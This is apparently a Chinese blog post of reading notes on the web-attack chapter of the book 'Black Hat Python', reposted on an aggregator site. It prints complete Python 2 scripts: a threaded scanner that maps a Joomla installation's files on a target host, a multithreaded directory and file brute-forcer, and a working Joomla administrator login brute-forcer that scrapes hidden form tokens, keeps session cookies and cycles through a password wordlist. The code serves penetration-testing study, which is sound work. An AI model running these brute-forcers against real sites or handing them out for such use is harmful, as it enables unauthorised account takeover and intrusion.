《Python黑帽子:黑客与渗透测试编程之道》读书笔记:web攻击

Posted 思源湖的鱼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了《Python黑帽子:黑客与渗透测试编程之道》读书笔记:web攻击相关的知识,希望对你有一定的参考价值。

前言

《Python黑帽子:黑客与渗透测试编程之道》的读书笔记,会包括书中源码,并自己将其中一些改写成Python3版本。书是比较老了,anyway,还是本很好的书

本篇是第5章web攻击,包括urllib2库,安装应用,破解目录,破解html表格认证

1、urllib2

编写与web服务交互的工具需要urllib2

下面简单看看如何创建一个GET请求,并定义一个user-agent

#!/usr/bin/env python
#-*- coding:utf8 -*-

import urllib2

url = "http://www.360.cn/"

headers={}
# Googlebot -> google爬虫
headers['User-Agent'] = "Googlebot"

request = urllib2.Request(url,headers=headers)
response = urllib2.urlopen(request)

print response.read()
response.close()

2、开源web应用安装

其实是获取远程目标所有文件的扫描器

#!/usr/bin/env python
#-*- coding:utf8 -*-

import Queue
import threading
import os
import urllib2

threads = 10

# 感兴趣的目标
target = "http://192.168.1.105/Joomla/"
directory = "./Joomla/"
filters = ["jpg", ".gif", ".png", ".css"]

os.chdir(directory)
web_paths = Queue.Queue()

# 遍历目录
for r,d,f in os.walk("."):
    for files in f:
        remote_path = "%s%s" % (r,files)
        if remote_path.startswith("."):
            remote_path = remote_path[1:]
        if os.path.splitext(files)[1] not in filters:
            web_paths.put(remote_path)

def test_remote():
    while not  web_paths.empty():
        path = web_paths.get()
        url = "%s%s" % (target, path)

        request = urllib2.Request(url)

        try:
            response = urllib2.urlopen(request)
            content = response.read()

            print  "[%d] => %s" % (response.code, path)
            response.close()

        except urllib2.HTTPError as error:
            print "Failed %s" % error.code
            pass

for i in range(threads):
    print "Spawning thread %d" % i
    t = threading.Thread(target=test_remote)
    t.start()

3、破解目录和文件位置

一个简单的目录爆破

#!/usr/bin/env python
#-*- coding:utf8 -*-
  
import urllib2  
import threading  
import Queue  
import urllib  
  
threads = 50  
target_url = "http://testphp.vulnweb.com"  
wordlist_file = "./all.txt"  #这个字典可参考SVNDigger或DirBuster
resume = None   #作者说用于网络中断时,延续上一个尝试的字符串,而不用从头开始,这里好像没用到  
user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36"  
  
  
def built_wordlist(wordlist_file):  
    #读入字典文件  
    fd = open(wordlist_file, "rb")  
    raw_words = fd.readlines()  
    fd.close()  
  
    found_resume = False  
    words = Queue.Queue()  
  
    for word in raw_words:  
        #删除字符串末尾的空格  
        word  = word.rstrip()  
        #如果是延续上一次
        if resume is not None:  
  
            if found_resume:  
                words.put(word)  
            else:  
                if word == resume:  
                    found_resume = True  
                    print "Resuming wordlist from: %s" % resume  
        else:  
            words.put(word)  
    return words  
  
def dir_bruter(word_queue, extentsions=None):  
  
    while not word_queue.empty():  
        attempt = word_queue.get() 

        #用于储存要尝试的url
        attempt_list = []  
  
        #检查是否有文件扩展名,如果没有就是我们要爆破路径,否则爆破文件  
        if "." not in attempt:  
            attempt_list.append("/%s/" % attempt)  
        else:  
            attempt_list.append("/%s" % attempt)  
  
        #如果我们想暴力破解扩展名  
        if extentsions:  
            for extentsion in extentsions:  
                attempt_list.append("/%s%s" % (attempt, extentsion))  
  
        #迭代我们要尝试的文件列表  
        for brute in attempt_list:  
            #构造url
            url = "%s%s" % (target_url, urllib.quote(brute))  
            #print url  
            try:  
                headers = {}  
                headers['User-Agent'] = user_agent  
                r = urllib2.Request(url, headers=headers)  
  
                response = urllib2.urlopen(r)  
                #print response.__dict__
                if len(response.read()):  
                    print "[%d] => %s" % (response.code, url) 
            #用e接收URLError的信息 
            except urllib2.URLError,e:  
                # code属性存在,并且code不是404  
                if hasattr(e, 'code') and e.code != 404:  
                    print "!!! %d => %s" % (e.code, url)  
                pass  
  
  
word_queue = built_wordlist(wordlist_file)  
extentsions = [".php", ".bak", ".orig",".inc"]  

#开启多线程扫描
for i in range(threads):  
    t = threading.Thread(target=dir_bruter, args=(word_queue, extentsions))  
    t.start()  

4、破解HTML表格认证

这是一个暴力破解Joomla的例子

  • 在提交密码前检索token
  • 利用urllib2建立session时设置cookie

Joomla的管理员表单

在这里插入图片描述

#!/usr/bin/env python
#-*- coding:utf8 -*-

import urllib2
import urllib
import cookielib
import threading
import sys
import Queue

from HTMLParser import HTMLParser

#简要设置
user_thread = 10
username ="giantbranch"
wordlist_file ="./mydict.txt"
resume = None

#特点目标设置
target_url = "http://192.168.1.105/Joomla/administrator/index.php"
target_post = "http://192.168.1.105/Joomla/administrator/index.php"

username_field = "username"
password_field = "passwd"

#登陆成功后,title里面就有下面的文字,注意是语言是英文才是下面的哦 
success_check = "Administration - Control Panel"

class BruteParser(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
        # 字典存储结果
        self.tag_results = {}

    #当我们调用feed函数时,他将整个HTML文档传递进来并在遇到每个标签时调用下面这个函数(根据函数名就容易理解)
    def handle_starttag(self, tag, attrs):
        #判断是否是input标签
        if tag == "input":
            tag_name = None
            tag_value = None
            for name,value in attrs:
                #input标签里面不是有name,value,type等属性吗,这里只判断name和value
                #不过我觉得第二个if是多余的
                if name == "name":
                    tag_name = value
                if name == "value":
                    tag_value = value
                if tag_name is not None:
                    self.tag_results[tag_name] = value

class Bruter(object):
    def __init__(self, username, words):
        self.username = username
        self.password_q = words
        self.found = False

        print "Finished setting up for %s" % username

    def run_bruteforce(self):
        for i in range(user_thread):
            t = threading.Thread(target=self.web_bruter)
            t.start()

    def web_bruter(self):
        while not self.password_q.empty() and not self.found:
            #从字典获取密码,并去除右边的空格
            brute = self.password_q.get().rstrip()
            #使用FileCookieJar类,将cookie值储存到文件,参数为文件名,可用于存取cookie
            jar = cookielib.FileCookieJar("cookies")
            #用上面的jar初始化urllib2打开器,这样下面请求url时,就会把cookie值存到那个文件中
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            response =opener.open(target_url)

            page = response.read()

            print  "Trying: %s : %s (%d left)" % (self.username, brute, self.password_q.qsize())

            #解析隐藏区域(表单)
            parser = BruteParser()
            parser.feed(page)

            #已经含有隐藏表单的键值
            post_tags = parser.tag_results

            #添加我们的用户名和密码区域
            post_tags[username_field] = self.username
            post_tags[password_field] = brute

            #输出post的数据(键值)
            # for key,value in post_tags.items():
            #     print key,':',value

            #url编码post的数据,开始尝试登陆
            login_data = urllib.urlencode(post_tags)
            login_response =opener.open(target_post, login_data)
            login_result = login_response.read()

            # 判断是否登陆成功
            if success_check in login_result:
                #设置为True,让循环结束
                self.found = True

                print "[*] Bruteforce successful."
                print "[*] Username: %s" % username
                print "[*] Password: %s" % brute
                print "[*] Waiting for other threads to exit..."

def built_wordlist(wordlist_file):
    #读入字典文件
    fd = open(wordlist_file, "rb")
    raw_words = fd.readlines()
    fd.close()

    found_resume = False
    words = Queue.Queue()

    for word in raw_words:
        #删除字符串末尾的空格
        word  = word.rstrip()
        #如果是延续上一次
        if resume is not None:

            if found_resume:
                words.put(word)
            else:
                if word == resume:
                    found_resume = True
                    print "Resuming wordlist from: %s" % resume
        else:
            words.put(word)
    return words

#构造字典
words = built_wordlist(wordlist_file)

#初始化Bruter类
bruter_obj = Bruter(username, words)
#调用run_bruteforce函数
bruter_obj.run_bruteforce()

结语

主要是学习web交互时的一些攻击,利用urllib2
但是由于本书较老,现在已经是urllib3了,对应HTTP1.1
所以实际应用时需要做相应修改

以上是关于《Python黑帽子:黑客与渗透测试编程之道》读书笔记:web攻击的主要内容,如果未能解决你的问题,请参考以下文章

《Python黑帽子:黑客与渗透测试编程之道》读书笔记:Windows提权

《Python黑帽子:黑客与渗透测试编程之道》读书笔记:Windows提权

《Python黑帽子:黑客与渗透测试编程之道》读书笔记:扩展burp代理

《Python黑帽子:黑客与渗透测试编程之道》读书笔记:扩展burp代理

《Python黑帽子:黑客与渗透测试编程之道》读书笔记:自动化攻击取证

《Python黑帽子:黑客与渗透测试编程之道》读书笔记:基于github的木马